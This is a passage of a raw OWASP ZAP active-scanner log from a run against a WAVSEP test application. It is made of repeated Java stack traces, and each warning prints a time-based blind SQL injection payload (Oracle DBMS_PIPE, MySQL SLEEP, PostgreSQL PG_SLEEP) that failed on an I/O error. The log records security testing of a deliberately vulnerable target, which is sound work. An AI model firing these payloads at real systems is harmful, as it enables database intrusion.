Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922469 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(90)||CHR(109)||CHR(66),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(90)||CHR(109)||CHR(66),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922471 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(83)||CHR(105)||CHR(73),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(83)||CHR(105)||CHR(73),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922472 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(108)||CHR(113)||CHR(104),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(108)||CHR(113)||CHR(104),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922473 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(89)||CHR(119)||CHR(81),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(89)||CHR(119)||CHR(81),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922475 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(67)||CHR(117)||CHR(114),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(67)||CHR(117)||CHR(114),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922476 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(100)||CHR(114)||CHR(99),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(100)||CHR(114)||CHR(99),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922477 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND (SELECT * FROM (SELECT(SLEEP(5)))NPqN) AND (8715=8715] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND (SELECT * FROM (SELECT(SLEEP(5)))NPqN) AND (8715=8715 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922479 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND (SELECT * FROM (SELECT(SLEEP(5)))DWBf)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND (SELECT * FROM (SELECT(SLEEP(5)))DWBf) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922481 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND (SELECT * FROM (SELECT(SLEEP(5)))IlQw) AND ('HbYH'='HbYH] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND (SELECT * FROM (SELECT(SLEEP(5)))IlQw) AND ('HbYH'='HbYH at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922485 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND (SELECT * FROM (SELECT(SLEEP(5)))ERXV) AND 'rbjw'='rbjw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND (SELECT * FROM (SELECT(SLEEP(5)))ERXV) AND 'rbjw'='rbjw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922487 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND (SELECT * FROM (SELECT(SLEEP(5)))FjoS) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND (SELECT * FROM (SELECT(SLEEP(5)))FjoS) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922489 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND (SELECT * FROM (SELECT(SLEEP(5)))kNrH)-- dLhe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND (SELECT * FROM (SELECT(SLEEP(5)))kNrH)-- dLhe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922490 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 3711=(SELECT 3711 FROM PG_SLEEP(5)) AND (4366=4366] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 3711=(SELECT 3711 FROM PG_SLEEP(5)) AND (4366=4366 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922492 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 6584=(SELECT 